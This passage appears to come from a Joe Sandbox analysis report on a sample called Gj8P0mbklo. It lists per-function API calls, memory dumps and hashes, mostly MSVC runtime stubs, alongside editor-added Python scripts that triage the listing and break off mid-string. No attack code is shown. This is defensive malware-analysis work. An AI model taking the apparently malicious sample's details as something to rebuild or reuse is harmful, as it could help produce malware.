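API_LINE = re.compile(r"^• (?P<func>[^.(\s]+)\.(?P<module>[A-Z0-9_]+)(?:\((?P<args>.*)\))?,? ref: (?P<ref>[0-9A-F]+)$")
STR_LINE = re.compile(r"^• (?P<s>.*), xrefs: (?P<ref>[0-9A-F]+)$")
FIELD = re.compile(r"^• (?P<key>[^:]+): ?(?P<val>.*)$")


def _new() -> Dict:
    return {"apis": [], "strings": [], "fields": {}, "uniqueness": None}


def parse_entries(text: str) -> List[Dict]:
    """Split the listing into entries; each entry ends at its 'Uniqueness Score' line."""
    entries, cur, section = [], _new(), None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line.startswith("Uniqueness Score:"):
            cur["uniqueness"] = line.split(":", 1)[1].strip()
            entries.append(cur)
            cur, section = _new(), None
        elif not line.startswith("•"):
            section = line            # APIs / Strings / Memory Dump Source / Similarity ...
        elif section == "APIs":
            m = API_LINE.match(line)
            if m:                     # args are a raw stack snapshot, not the real prototype
                cur["apis"].append(m.groupdict())
        elif section == "Strings":
            m = STR_LINE.match(line)
            if m:
                cur["strings"].append(m.group("s"))
        else:
            m = FIELD.match(line)
            if m:
                cur["fields"][m.group("key")] = m.group("val")
    return entries


def classify(entry: Dict) -> str:
    key = (entry["fields"].get("API ID", ""), entry["fields"].get("String ID", ""))
    return CRT_BOILERPLATE.get(key, "REVIEW: not a known CRT stub")


def triage(text: str) -> List[Tuple[str, str, str]]:
    """(API String ID, called APIs, verdict) per entry, so a reviewer can skip runtime noise."""
    rows = []
    for e in parse_entries(text):
        apis = ", ".join(a["func"] for a in e["apis"]) or "-"
        rows.append((e["fields"].get("API String ID", "?"), apis, classify(e)))
    return rows


if __name__ == "__main__":
    for sid, apis, verdict in triage(SAMPLE):
        print(f"{sid:<24} {apis:<60} {verdict}")
```

Run it against a copy-pasted listing and the two FLS and FreeLibrary entries come back as CRT stubs, while the entry that only references the sample's own path is left for manual review. The argument lists Joe Sandbox prints in parentheses are stack contents at the call site, so only the first few values correspond to the documented parameters; the script keeps them but does not interpret them.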

APIs
• GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,145F793C,0037A97D,?,00000000,003953A1,000000FF,?,00381723,C95B5E5F,?,003816F7,0000000C), ref: 0038177C
• GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0038178E
• FreeLibrary.KERNEL32(00000000,?,00000000,003953A1,000000FF,?,00381723,C95B5E5F,?,003816F7,0000000C), ref: 003817B0
Strings
Memory Dump Source
• Source File: 00000000.00000002.2152269014.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
• Associated: 00000000.00000002.2152252733.0000000000350000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2152294843.0000000000396000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2152309281.00000000003A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2152320066.00000000003A9000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_350000_Gj8P0mbklo.jbxd
Similarity
• API ID: AddressFreeHandleLibraryModuleProc
• String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                            • API String ID: 4061214504-1276376045
                                                                                                                                                                                            • Opcode ID: 1f93a9489c703e3fa96bc2f8f258620417fe321fc378246e0a990e31380d54ee
                                                                                                                                                                                            • Instruction ID: d93c36d0d745103c5440d2a8686df89e3578a6a7454d0beee76a47f6e6786ffc
                                                                                                                                                                                            • Opcode Fuzzy Hash: 1f93a9489c703e3fa96bc2f8f258620417fe321fc378246e0a990e31380d54ee
                                                                                                                                                                                            • Instruction Fuzzy Hash: A9018131945629EFDB139F54DC46BAEBBBCFB45B15F00062AF812E2390DB769901CB90
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            APIs
                                                                                                                                                                                            • ___std_exception_copy.LIBVCRUNTIME ref: 003647D9
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.2152269014.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.2152252733.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152294843.0000000000396000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152309281.00000000003A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152320066.00000000003A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_350000_Gj8P0mbklo.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: ___std_exception_copy
                                                                                                                                                                                            • String ID: Te9$parse error$parse_error
                                                                                                                                                                                            • API String ID: 2659868963-3911243356
                                                                                                                                                                                            • Opcode ID: a8abf5e322b904bb3df029666b2eb34c398ef9d2af15825a254042aa79f6de8f
                                                                                                                                                                                            • Instruction ID: 352db147d3f11f1bfc49aaa12ad70c345c7202cfb4f574b61a9a28448897c3e5
                                                                                                                                                                                            • Opcode Fuzzy Hash: a8abf5e322b904bb3df029666b2eb34c398ef9d2af15825a254042aa79f6de8f
                                                                                                                                                                                            • Instruction Fuzzy Hash: CF910271D102088BDB1ADFA8CC85BEDB7B5FF5A310F148618E414BB691E775AA84CB90
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            APIs
                                                                                                                                                                                            • ___std_exception_destroy.LIBVCRUNTIME ref: 00356291
                                                                                                                                                                                            • ___std_exception_destroy.LIBVCRUNTIME ref: 003562A0
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.2152269014.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.2152252733.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152294843.0000000000396000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152309281.00000000003A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152320066.00000000003A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_350000_Gj8P0mbklo.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: ___std_exception_destroy
                                                                                                                                                                                            • String ID: Te9$[json.exception.
                                                                                                                                                                                            • API String ID: 4194217158-3570959056
                                                                                                                                                                                            • Opcode ID: cd81e3ee0556c74dfb752473d1117bb762231468ced0938aedec34a2d472ca8b
                                                                                                                                                                                            • Instruction ID: 718cfef972f8a1bdd1b5c07a19c8ac73c78fc22174700e07906cd41f90d68824
                                                                                                                                                                                            • Opcode Fuzzy Hash: cd81e3ee0556c74dfb752473d1117bb762231468ced0938aedec34a2d472ca8b
                                                                                                                                                                                            • Instruction Fuzzy Hash: 2331483060030457CB2AAF28C843F6EB7EAAF54711F544A1DF8459B792DBB4EA8883D0
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            APIs
                                                                                                                                                                                            • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00379A6D,00000000,?,003A849C,?,?,?,00379C10,00000004,InitializeCriticalSectionEx,00397E1C,InitializeCriticalSectionEx), ref: 00379AC9
                                                                                                                                                                                            • GetLastError.KERNEL32(?,00379A6D,00000000,?,003A849C,?,?,?,00379C10,00000004,InitializeCriticalSectionEx,00397E1C,InitializeCriticalSectionEx,00000000,?,00378A70), ref: 00379AD3
                                                                                                                                                                                            • LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 00379AFB
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.2152269014.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.2152252733.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152294843.0000000000396000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152309281.00000000003A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152320066.00000000003A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_350000_Gj8P0mbklo.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: LibraryLoad$ErrorLast
                                                                                                                                                                                            • String ID: api-ms-
                                                                                                                                                                                            • API String ID: 3177248105-2084034818
                                                                                                                                                                                            • Opcode ID: ca2208af0249eb77a6e8c29887f0694d1a7837c6f6cccffe9e71d3d10215a63d
                                                                                                                                                                                            • Instruction ID: f5995e2cff28b9b7e6885b76e81b87f0e65597cc75a251321a9e7889923f1a9a
                                                                                                                                                                                            • Opcode Fuzzy Hash: ca2208af0249eb77a6e8c29887f0694d1a7837c6f6cccffe9e71d3d10215a63d
                                                                                                                                                                                            • Instruction Fuzzy Hash: 53E04831248348BBDF221B65FC47F583A5CAB00B40F118121F90DA85E1D7779914C554
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            APIs
                                                                                                                                                                                            • GetConsoleOutputCP.KERNEL32(145F793C,00000000,00000000,?), ref: 003852EB
                                                                                                                                                                                              • Part of subcall function 0038A90C: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,003897C0,?,00000000,-00000008), ref: 0038A96D
                                                                                                                                                                                            • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0038553D
                                                                                                                                                                                            • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00385583
                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 00385626
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.2152269014.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.2152252733.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152294843.0000000000396000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152309281.00000000003A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152320066.00000000003A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_350000_Gj8P0mbklo.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 2112829910-0
                                                                                                                                                                                            • Opcode ID: 46727d9b4869b39f081ef66fe5f0b2545b7097f8b3977f51556429f9854087e2
                                                                                                                                                                                            • Instruction ID: 490be997d1658310669bdc7492cb4c7a733b3e3c2ff35e9ec01ee76acdd44cd0
                                                                                                                                                                                            • Opcode Fuzzy Hash: 46727d9b4869b39f081ef66fe5f0b2545b7097f8b3977f51556429f9854087e2
                                                                                                                                                                                            • Instruction Fuzzy Hash: 59D16C75D046489FCF16DFA8D8809ADBBB9FF09314F28416AE416EB351E630A942CB50
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.2152269014.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.2152252733.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152294843.0000000000396000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152309281.00000000003A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152320066.00000000003A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_350000_Gj8P0mbklo.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID: w@8$w@8$w@8
                                                                                                                                                                                            • API String ID: 0-3684850163
                                                                                                                                                                                            • Opcode ID: a1ff8a993611eab33035f6a17d53c3fef90db2c49b8d76f30211eb1b9ee47c9f
                                                                                                                                                                                            • Instruction ID: 0d1078c8936f3c65100f4ddd0f8d3e9c8da578d9378a4497bfb7a93165fa7668
• Opcode Fuzzy Hash: a1ff8a993611eab33035f6a17d53c3fef90db2c49b8d76f30211eb1b9ee47c9f
• Instruction Fuzzy Hash: E881E274A0035A9FDF22EF95C884ABFBBB8FF45310F1545A9E821A7241D7709E40CBA1
Uniqueness

Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000000.00000002.2152269014.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
• Associated: 00000000.00000002.2152252733.0000000000350000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2152294843.0000000000396000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2152309281.00000000003A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2152320066.00000000003A9000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_350000_Gj8P0mbklo.jbxd
Similarity
• API ID: AdjustPointer
• String ID:
• API String ID: 1740715915-0
• Opcode ID: 3915b0be4dc6fb303a80523b208d1640220179db636755df34e436ff7124d8d1
• Instruction ID: 8e5a197392e90db4c5df2a3c31416cba4b75e0887eca479958f5128ac133d9c2
• Opcode Fuzzy Hash: 3915b0be4dc6fb303a80523b208d1640220179db636755df34e436ff7124d8d1
• Instruction Fuzzy Hash: F051F376641602AFDB3B9F14C849BBAB3A5EF50310F15C52DE90D5B6D0EB39AC40C790
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000000.00000002.2152269014.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
• Associated: 00000000.00000002.2152252733.0000000000350000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2152294843.0000000000396000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2152309281.00000000003A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2152320066.00000000003A9000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_350000_Gj8P0mbklo.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: b6adef04e8faee3d5b4c39c4d48006f80b92a2e383d85b54fe15ca97bd74673a
• Instruction ID: c5ce562cfe313689f0884d826bf924da6592fbd3296929f9ee0110286de3a793
• Opcode Fuzzy Hash: b6adef04e8faee3d5b4c39c4d48006f80b92a2e383d85b54fe15ca97bd74673a
• Instruction Fuzzy Hash: DA412E72A04704AFD726BF38CC01B5ABFAAEB48710F20866AF055DF681D3B1D941C780
Uniqueness

Uniqueness Score: -1.00%

APIs
  • Part of subcall function 0038A90C: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,003897C0,?,00000000,-00000008), ref: 0038A96D
• GetLastError.KERNEL32 ref: 0038991C
• __dosmaperr.LIBCMT ref: 00389923
• GetLastError.KERNEL32(?,?,?,?), ref: 0038995D
• __dosmaperr.LIBCMT ref: 00389964
Memory Dump Source
• Source File: 00000000.00000002.2152269014.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
• Associated: 00000000.00000002.2152252733.0000000000350000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2152294843.0000000000396000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2152309281.00000000003A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2152320066.00000000003A9000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_350000_Gj8P0mbklo.jbxd
Similarity
• API ID: ErrorLast__dosmaperr$ByteCharMultiWide
• String ID:
• API String ID: 1913693674-0
• Opcode ID: 4c028ea6da08e95ab1bb453b9b010100174fab6ddae0719c82630970de5eb8d0
• Instruction ID: 0ffff38d2469afc5da2e0496a0a4f5f2ae54d8999b4a6bea264ba7dfd5948faf
• Opcode Fuzzy Hash: 4c028ea6da08e95ab1bb453b9b010100174fab6ddae0719c82630970de5eb8d0
• Instruction Fuzzy Hash: 7221A171600305AFDB22BF668C81B3AB7ADFF05364B19845EF86A9B610DB35EC008790
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetEnvironmentStringsW.KERNEL32 ref: 0038A9B7
  • Part of subcall function 0038A90C: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,003897C0,?,00000000,-00000008), ref: 0038A96D
• FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0038A9EF
• FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0038AA0F
Memory Dump Source
• Source File: 00000000.00000002.2152269014.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
• Associated: 00000000.00000002.2152252733.0000000000350000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2152294843.0000000000396000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2152309281.00000000003A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2152320066.00000000003A9000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_350000_Gj8P0mbklo.jbxd
Similarity
• API ID: EnvironmentStrings$Free$ByteCharMultiWide
• String ID:
• API String ID: 158306478-0
• Opcode ID: e59c1c7e550665651f2cf5e0fb11070987ee6c429cff823d9aa2346725d9f71f
• Instruction ID: d23f254b708b3e86555aab703219736a56e769e335e09e4162f9b3bc29162cd2
• Opcode Fuzzy Hash: e59c1c7e550665651f2cf5e0fb11070987ee6c429cff823d9aa2346725d9f71f
• Instruction Fuzzy Hash: 2611EDF250AB197EB71737B25D8ACAF2E5CCE8439571204A6F902D5201EA389E0083B2
Uniqueness

Uniqueness Score: -1.00%

APIs
• WriteConsoleW.KERNEL32(00000000,?,0037A97D,00000000,00000000,?,003905EA,00000000,00000001,?,?,?,0038567A,?,00000000,00000000), ref: 00393B4E
• GetLastError.KERNEL32(?,003905EA,00000000,00000001,?,?,?,0038567A,?,00000000,00000000,?,?,?,00385C1D,?), ref: 00393B5A
  • Part of subcall function 00393B20: CloseHandle.KERNEL32(FFFFFFFE,00393B6A,?,003905EA,00000000,00000001,?,?,?,0038567A,?,00000000,00000000,?,?), ref: 00393B30
• ___initconout.LIBCMT ref: 00393B6A
  • Part of subcall function 00393ADE: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00393B0D,003905D7,?,?,0038567A,?,00000000,00000000,?), ref: 00393AF1
• WriteConsoleW.KERNEL32(00000000,?,0037A97D,00000000,?,003905EA,00000000,00000001,?,?,?,0038567A,?,00000000,00000000,?), ref: 00393B7F
Memory Dump Source
• Source File: 00000000.00000002.2152269014.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
• Associated: 00000000.00000002.2152252733.0000000000350000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2152294843.0000000000396000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2152309281.00000000003A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2152320066.00000000003A9000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_350000_Gj8P0mbklo.jbxd
Similarity
• API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
• String ID:
• API String ID: 2744216297-0
• Opcode ID: 718ee88ac003f23ea67571d9dd91f0ba67ceb099b9f665681deea1b65a3bb9ef
• Instruction ID: 8c7728bf491d8502ed8f9c4a6d85145769cfbe186d40853c3ba8fa02f2aa995a
• Opcode Fuzzy Hash: 718ee88ac003f23ea67571d9dd91f0ba67ceb099b9f665681deea1b65a3bb9ef
• Instruction Fuzzy Hash: BBF0C937545218BBCF236FD5DC0AA9E3F2AFB093B1F054415FA1996271C632CA60DB90
Uniqueness

Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 00000000.00000002.2152269014.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
• Associated: 00000000.00000002.2152252733.0000000000350000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2152294843.0000000000396000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2152309281.00000000003A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2152320066.00000000003A9000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_350000_Gj8P0mbklo.jbxd
Similarity
• API ID:
• String ID: Pp:$Pp:
• API String ID: 0-4107611570
• Opcode ID: 5314aa7033a982fc3b1682f1a4c5ee3261092e4aa34ec0d0cf9b5d823cb062a5
• Instruction ID: dbd009794b235818e122787acdfe73b0abe810b3c0d14d253bf4cfa65f128d18
• Opcode Fuzzy Hash: 5314aa7033a982fc3b1682f1a4c5ee3261092e4aa34ec0d0cf9b5d823cb062a5
• Instruction Fuzzy Hash: F6B145B2940705AAEB21FFA5DC82FEBB7ECAB04700F1545A5FA15EF186E770D9048B50
Uniqueness

Uniqueness Score: -1.00%

APIs
• ___std_exception_copy.LIBVCRUNTIME ref: 00366B87
Strings
Memory Dump Source
• Source File: 00000000.00000002.2152269014.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
• Associated: 00000000.00000002.2152252733.0000000000350000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2152294843.0000000000396000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2152309281.00000000003A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2152320066.00000000003A9000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_350000_Gj8P0mbklo.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: ___std_exception_copy
                                                                                                                                                                                            • String ID: Te9$out_of_range
                                                                                                                                                                                            • API String ID: 2659868963-956814458
                                                                                                                                                                                            • Opcode ID: 91c6ff3593477473e4bbcf98d3b0a800ad08e6d03e9a1d3e2291ce09eac5338c
                                                                                                                                                                                            • Instruction ID: 2edc7024bafe63b285a05de99b50250533cc3a68dc9561c5e5f960a6aaf58fce
                                                                                                                                                                                            • Opcode Fuzzy Hash: 91c6ff3593477473e4bbcf98d3b0a800ad08e6d03e9a1d3e2291ce09eac5338c
                                                                                                                                                                                            • Instruction Fuzzy Hash: 28512871D102088BDB1EDFA8CC86BEEB775EF55300F10C61CE411BB696D778AA888B50
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            APIs
                                                                                                                                                                                            • EncodePointer.KERNEL32(00000000,?), ref: 00379288
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.2152269014.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.2152252733.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152294843.0000000000396000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152309281.00000000003A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152320066.00000000003A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_350000_Gj8P0mbklo.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: EncodePointer
                                                                                                                                                                                            • String ID: MOC$RCC
                                                                                                                                                                                            • API String ID: 2118026453-2084237596
                                                                                                                                                                                            • Opcode ID: c50455448f6212aefba6dbeb43bbf18c90c9a38ddf061928018d89d8582c6e33
                                                                                                                                                                                            • Instruction ID: 816fb405953ca681c1976989ce58dd81ffd8c2673871caa70bf000bc455b5eb0
                                                                                                                                                                                            • Opcode Fuzzy Hash: c50455448f6212aefba6dbeb43bbf18c90c9a38ddf061928018d89d8582c6e33
                                                                                                                                                                                            • Instruction Fuzzy Hash: 64418871900209AFDF26DF94CC81BAEBBB5BF48314F15829AF908AB261D3399950DF50
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            APIs
                                                                                                                                                                                            • ___std_exception_destroy.LIBVCRUNTIME ref: 0035647E
                                                                                                                                                                                            • ___std_exception_destroy.LIBVCRUNTIME ref: 0035648D
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.2152269014.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.2152252733.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152294843.0000000000396000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152309281.00000000003A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152320066.00000000003A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_350000_Gj8P0mbklo.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: ___std_exception_destroy
                                                                                                                                                                                            • String ID: Te9
                                                                                                                                                                                            • API String ID: 4194217158-3548072084
                                                                                                                                                                                            • Opcode ID: 276c3ed79ba903fcb1f9c0186ebd5ad7f7b1303dcb56a273e68787e397f27329
                                                                                                                                                                                            • Instruction ID: 169bdbfa606ae6c29ed9f70013b6140ccefbccf590dc50631e742ed0110f6eab
                                                                                                                                                                                            • Opcode Fuzzy Hash: 276c3ed79ba903fcb1f9c0186ebd5ad7f7b1303dcb56a273e68787e397f27329
                                                                                                                                                                                            • Instruction Fuzzy Hash: 99D012B5805B2447DB72AF24E83B88273EC6F153143054D1EE895A760AE7B4EE4C47A0
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%
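The per-function records above are MSVC runtime internals (std::exception copy/destroy helpers, the EncodePointer call made by the CRT's startup code), which is why every one carries the same non-distinctive uniqueness score; an analyst working through a report of this size wants to skip them and rebase the remaining "ref:" addresses into a disassembler. The script below is an added example written for this page, not code from the report or from Joe Sandbox. It parses records in exactly the layout printed above, treats the dump's "Offset: 00350000" as the image base (an assumption, supported by the "based on PE: true" flag), flags records whose only APIs are CRT scaffolding, de-duplicates by Opcode ID and converts each "ref:" virtual address to an RVA. The CRT_SCAFFOLD_APIS set and the sample records are constructed by the editor (the records are copied from the three functions above).

```python
"""Triage Joe Sandbox per-function records in the layout shown above: parse them,
drop MSVC runtime scaffolding, de-duplicate identical code by Opcode ID and turn
each 'ref:' address into an RVA for rebasing in IDA/Ghidra. Editor's example, not
part of the report or of Joe Sandbox. Assumed: the Source File 'Offset' is the
image base (supported by 'based on PE: true'); CRT_SCAFFOLD_APIS is a heuristic."""
import re
from dataclasses import dataclass, field

# Constructed sample: the three records above, with the extraction whitespace
# and the Associated/Snapshot lines trimmed away.
SAMPLE = """\
APIs
• ___std_exception_copy.LIBVCRUNTIME ref: 00366B87
Memory Dump Source
• Source File: 00000000.00000002.2152269014.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
Similarity
• String ID: Te9$out_of_range
• Opcode ID: 91c6ff3593477473e4bbcf98d3b0a800ad08e6d03e9a1d3e2291ce09eac5338c
Uniqueness Score: -1.00%
APIs
• EncodePointer.KERNEL32(00000000,?), ref: 00379288
Memory Dump Source
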